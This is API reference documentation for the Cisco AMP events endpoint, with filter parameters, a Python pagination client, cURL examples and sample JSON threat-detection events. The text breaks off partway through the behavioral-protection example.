GET /v0/events
Description
This is a general query interface for events. This is analogous to the Events view on the FireAMP Console.
Events can be filtered by a variety of criteria. Criteria of different types are logically ANDed together; multiple values supplied for the same criterion are logically ORed. For example, the query string connector_guid[]=ead39d47-93bd-4230-b692-454b433faf96&event_type[]=2164260868&event_type[]=1090519054 returns events that match the connector GUID ead39d47-93bd-4230-b692-454b433faf96 AND have event type (1090519054 OR 2164260868).
The values accepted by the event_type and group_guid parameters can be retrieved from their respective endpoints.
Query Parameters
Name | Type | Example Values | Description |
---|---|---|---|
detection_sha256 | String | f8a6a244138cb1e2f044f63f3dc42beeb555da892bbd7a121274498cbdfc9ad5 | |
application_sha256 | String | 80ef843fa78c33b511394a9c7535a9cbace1deb2270e86ee4ad2faffa5b1e7d2 | |
limit | Integer | 1, 2, 10 | |
connector_guid[] | GUID | af73d9d5-ddc5-4c93-9c6d-d5e6b5c5eb01 | |
group_guid[] | GUID | b077d6bc-bbdf-42f7-8838-a06053fbd98a | |
start_date | String (Time ISO8601) | 2015-10-01T00:00:00+00:00 | Inclusive (The list will include events that match start_date) |
offset | Integer | 10 | |
event_type[] | Array | 1090519054, 1090519084 | |
Name | Type | Description |
---|---|---|
version | String | |
metadata.links.self | String | |
metadata.links.prev | String | |
metadata.links.next | String | |
metadata.results.total | Integer | |
metadata.results.current_item_count | Integer | |
metadata.results.index | Integer | |
metadata.results.items_per_page | Integer | |
data | Array | |
data[].id | Integer | |
data[].timestamp | Integer | |
data[].timestamp_nanoseconds | Integer | |
data[].date | String (Time ISO8601) | |
data[].event_type | String | |
data[].event_type_id | Integer | |
data[].detection | String | |
data[].detection_id | String | |
data[].group_guids | Array | |
data[].group_guids[] | GUID | |
data[].computer.connector_guid | GUID | |
data[].computer.hostname | String | |
data[].computer.external_ip | String | |
data[].computer.user | String | |
data[].computer.active | Boolean | |
data[].computer.network_addresses | Array | |
data[].computer.network_addresses[].ip | String | |
data[].computer.network_addresses[].mac | String | |
data[].computer.links.computer | String | |
data[].computer.links.trajectory | String | |
data[].computer.links.group | String | |
data[].file.disposition | String | |
data[].file.file_name | String | |
data[].file.file_path | String | |
data[].file.identity.sha256 | String | |
data[].file.identity.sha1 | String | |
data[].file.identity.md5 | String | |
data[].file.parent.process_id | Integer | |
data[].file.parent.disposition | String | |
data[].file.parent.file_name | String | |
data[].file.parent.identity.sha256 | String | |
data[].file.parent.identity.sha1 | String | |
data[].file.parent.identity.md5 | String | |
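To show how the AND/OR filter semantics, the metadata.links.next pagination field and the x-ratelimit-* response headers shown in the examples below fit together, here is an added Python client sketch written for this page (example code, not Cisco's own SDK). It assumes a fetch callable that returns (status, headers, body); FakeApi and the two sample events are constructed stand-ins shaped like the responses on this page, and the event type IDs are the ones the examples use.

```python
import json
import time
from typing import Callable, Dict, Iterator, List, Tuple
from urllib.parse import urlencode

BASE_URL = "https://api.consumer.amp.cisco.com"  # host used in the sample requests
THREAT_DETECTED = 1090519054     # "Threat Detected" event_type_id from the samples
BP_THREAT_DETECTION = 553648222  # Behavioral Protection "Threat Detection" type


def build_events_url(base: str = BASE_URL, **filters) -> str:
    """List-valued filters become repeated name[] parameters (values ORed);
    distinct parameters are ANDed by the server. urlencode yields %5B%5D, %3A, %2B."""
    params: List[Tuple[str, str]] = []
    for name, value in filters.items():
        if value is None:
            continue
        if isinstance(value, (list, tuple, set)):
            params.extend((f"{name}[]", str(v)) for v in value)
        else:
            params.append((name, str(value)))
    return f"{base}/v0/events?{urlencode(params)}"


def iter_events(fetch: Callable[[str], Tuple[int, Dict[str, str], bytes]],
                url: str, sleep=time.sleep, max_retries: int = 3) -> Iterator[dict]:
    """Yield every event from url onward, following metadata.links.next and
    sleeping x-ratelimit-reset seconds on HTTP 429 or when the quota hits 0."""
    retries = 0
    while url:
        status, raw_headers, body = fetch(url)
        headers = {k.lower(): v for k, v in raw_headers.items()}  # header names are case-insensitive
        if status == 429 and retries < max_retries:
            retries += 1
            sleep(int(headers.get("x-ratelimit-reset", "1")))
            continue  # retry the same page
        if status != 200:
            raise RuntimeError(f"HTTP {status} from {url}")
        retries, page = 0, json.loads(body)
        yield from page["data"]
        if headers.get("x-ratelimit-remaining") == "0":
            sleep(int(headers.get("x-ratelimit-reset", "1")))
        url = page["metadata"]["links"].get("next")  # absent on the last page


def summarize(event: dict) -> dict:
    """Flatten triage fields; BP events carry the process chain in bp_data, not file."""
    out = {"date": event["date"], "host": event["computer"]["hostname"],
           "type_id": event["event_type_id"], "detection": event.get("detection")}
    if "file" in event:
        out["sha256"] = event["file"]["identity"]["sha256"]
        out["parent"] = event["file"].get("parent", {}).get("file_name")
    bp = event.get("bp_data")
    if bp:
        matched = bp["details"]["matched_activity"]["events"]
        starts = [m["process:start"] for m in matched if "process:start" in m]
        out["chain"] = [f"{s['parent_app']} -> {s['app']}" for s in starts]
        out["remediated"] = bp.get("remediated")
    return out


# Constructed sample events, trimmed to the fields summarize() reads but shaped like this page's responses.
SAMPLE_FILE_EVENT = {
    "id": 1, "date": "2022-03-18T11:20:38+00:00", "event_type_id": THREAT_DETECTED,
    "detection": "W32.GenericKD:ZVETJ.18gs.1201", "computer": {"hostname": "Demo_Upatre"},
    "file": {"identity": {"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40"},
             "parent": {"file_name": "iexplore.exe"}}}
SAMPLE_BP_EVENT = {
    "id": 2, "date": "2022-03-17T16:14:44+00:00", "event_type_id": BP_THREAT_DETECTION,
    "detection": "WMIPRVSE Launched Encoded Powershell Command", "computer": {"hostname": "Demo_BP_WMIPRVSE"},
    "bp_data": {"remediated": False, "details": {"matched_activity": {"events": [
        {"process:start": {"app": "powershell.exe", "parent_app": "WmiPrvSE.exe"}}]}}}}


class FakeApi:
    """Offline stand-in: two one-event pages, first call answered with a 429 to exercise back-off."""
    def __init__(self) -> None:
        self.first = build_events_url(event_type=[THREAT_DETECTED, BP_THREAT_DETECTION], limit=1)
        second = self.first + "&offset=1"
        self.pages = {self.first: (second, [SAMPLE_FILE_EVENT]), second: (None, [SAMPLE_BP_EVENT])}
        self.calls, self.slept = 0, []
    def fetch(self, url: str) -> Tuple[int, Dict[str, str], bytes]:
        self.calls += 1
        if self.calls == 1:
            return 429, {"X-RateLimit-Reset": "3"}, b""  # mixed-case header, as servers may send
        nxt, events = self.pages[url]
        links = {"self": url, **({"next": nxt} if nxt else {})}
        body = {"version": "v0.2.2", "data": events, "metadata": {"links": links,
                "results": {"total": 2, "current_item_count": 1, "items_per_page": 1}}}
        return 200, {"x-ratelimit-remaining": "5", "x-ratelimit-reset": "2"}, json.dumps(body).encode()


def collect_demo() -> Tuple[List[dict], int, List[int]]:
    """Walk the fake API end to end; returns (summaries, HTTP calls made, sleep durations)."""
    api = FakeApi()
    summaries = [summarize(e) for e in iter_events(api.fetch, api.first, sleep=api.slept.append)]
    return summaries, api.calls, api.slept
```

Against the real endpoint, replace FakeApi.fetch with a function that issues the authenticated GET shown in the cURL examples and returns the status, headers and body.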
Examples
- Fetch list of events sorted in descending order by timestamp
- Fetch list of events filtered by connector_guid
- Fetch list of events filtered by group_guid
- Fetch list of events filtered by detection_sha256 and application_sha256
- Fetch list of events filtered by event_type
- Fetch list of Behavioral Protection Detection events
- Fetch events that are newer than a given timestamp
- Fetch list of events filtered by SCAN_STARTED event type
Fetch list of events sorted in descending order by timestamp
Request
Requires Authorization
GET /v0/events?limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?limit=2'
Response
Shortened for readability
content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 885
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2825
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"491b4ecf936933a7de3aa4e55f67d031"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?limit=2",
"next": "https://api.consumer.amp.cisco.com/v0/events?limit=2&offset=2"
},
"results": {
"total": 1165,
"current_item_count": 2,
"index": 0,
"items_per_page": 2
}
},
"data": [
{
"id": 6180352115244794000,
"timestamp": 1647602438,
"timestamp_nanoseconds": 279000000,
"date": "2022-03-18T11:20:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180352115244793858",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
},
{
"id": 6180351977805840000,
"timestamp": 1647602406,
"timestamp_nanoseconds": 548000000,
"date": "2022-03-18T11:20:06+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180351977805840385",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by connector_guid
Request
Requires Authorization
GET /v0/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1'
Response
Shortened for readability
content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 884
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2824
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"0c03fe5adb1c02f797d7b071f8428949"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1",
"next": "https://api.consumer.amp.cisco.com/v0/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1&offset=1"
},
"results": {
"total": 34,
"current_item_count": 1,
"index": 0,
"items_per_page": 1
}
},
"data": [
{
"id": 6180352115244794000,
"timestamp": 1647602438,
"timestamp_nanoseconds": 279000000,
"date": "2022-03-18T11:20:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180352115244793858",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by group_guid
Request
Requires Authorization
GET /v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1'
Response
Shortened for readability
content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 883
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2823
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"3b0a203257835ee3a4810a1f00d7c603"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1",
"next": "https://api.consumer.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1&offset=1"
},
"results": {
"total": 279,
"current_item_count": 1,
"index": 0,
"items_per_page": 1
}
},
"data": [
{
"id": 6180352115244794000,
"timestamp": 1647602438,
"timestamp_nanoseconds": 279000000,
"date": "2022-03-18T11:20:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180352115244793858",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by detection_sha256 and application_sha256
Request
Requires Authorization
GET /v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1'
Response
Shortened for readability
content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 882
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2822
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"323d38b9e77e8b2408cdd12058712394"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1",
"next": "https://api.consumer.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1&offset=1"
},
"results": {
"total": 2,
"current_item_count": 1,
"index": 0,
"items_per_page": 1
}
},
"data": [
{
"id": 6180352115244794000,
"timestamp": 1647602438,
"timestamp_nanoseconds": 279000000,
"date": "2022-03-18T11:20:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180352115244793858",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by event_type
Request
Requires Authorization
GET /v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10'
Response
Shortened for readability
content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 882
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2821
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"13adbdaf40e33151322b027671f737d4"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10",
"prev": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=0",
"next": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=20"
},
"results": {
"total": 744,
"current_item_count": 10,
"index": 10,
"items_per_page": 10
}
},
"data": [
{
"id": 6533671385032557000,
"timestamp": 1647599259,
"timestamp_nanoseconds": 14000000,
"date": "2022-03-18T10:27:39+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.File.MalParent",
"detection_id": "6533671380737589309",
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"group_guids": [
"6a208a97-badf-4296-87c2-40779ffff0af"
],
"severity": "Medium",
"computer": {
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"hostname": "Demo_AMP_Threat_Audit",
"external_ip": "149.20.236.110",
"user": "johndoe",
"active": true,
"network_addresses": [
{
"ip": "237.160.117.93",
"mac": "b9:f4:70:d0:30:68"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
}
},
"file": {
"disposition": "Malicious",
"file_name": "ekjrngjker.exe",
"file_path": "C:\\ekjrngjker.exe",
"identity": {
"sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
"sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
"md5": "b99e0a8c56f963246b6464b9fffbf7a2"
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
},
{
"id": 6533671380737589000,
"timestamp": 1647599258,
"timestamp_nanoseconds": 605000000,
"date": "2022-03-18T10:27:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.File.MalParent",
"detection_id": "6533671380737589308",
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"group_guids": [
"6a208a97-badf-4296-87c2-40779ffff0af"
],
"severity": "Medium",
"computer": {
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"hostname": "Demo_AMP_Threat_Audit",
"external_ip": "149.20.236.110",
"user": "johndoe",
"active": true,
"network_addresses": [
{
"ip": "237.160.117.93",
"mac": "b9:f4:70:d0:30:68"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
}
},
"file": {
"disposition": "Malicious",
"file_name": "ekjrngjker.exe",
"file_path": "C:\\ekjrngjker.exe",
"identity": {
"sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
"sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
"md5": "b99e0a8c56f963246b6464b9fffbf7a2"
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of Behavioral Protection Detection events
Request
Requires Authorization
GET /v0/events?event_type%5B%5D=553648222&limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2'
Response
Shortened for readability
content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 882
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2820
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"120bbb85c64f6158c1f1006717a4e389"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2",
"next": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2&offset=2"
},
"results": {
"total": 32,
"current_item_count": 2,
"index": 0,
"items_per_page": 2
}
},
"data": [
{
"id": 6880683125978957000,
"timestamp": 1647533684,
"timestamp_nanoseconds": 810000000,
"date": "2022-03-17T16:14:44+00:00",
"event_type": "Threat Detection",
"event_type_id": 553648222,
"detection": "WMIPRVSE Launched Encoded Powershell Command",
"connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
"group_guids": [
"3aef61ae-a41f-4a89-a47d-1ce96164eea8"
],
"severity": "Medium",
"computer": {
"connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
"hostname": "Demo_BP_WMIPRVSE",
"external_ip": "234.38.52.99",
"active": true,
"network_addresses": [
{
"ip": "157.184.70.94",
"mac": "67:71:7f:26:b1:5f"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/f3185c52-4903-41da-a833-04a534460eb3",
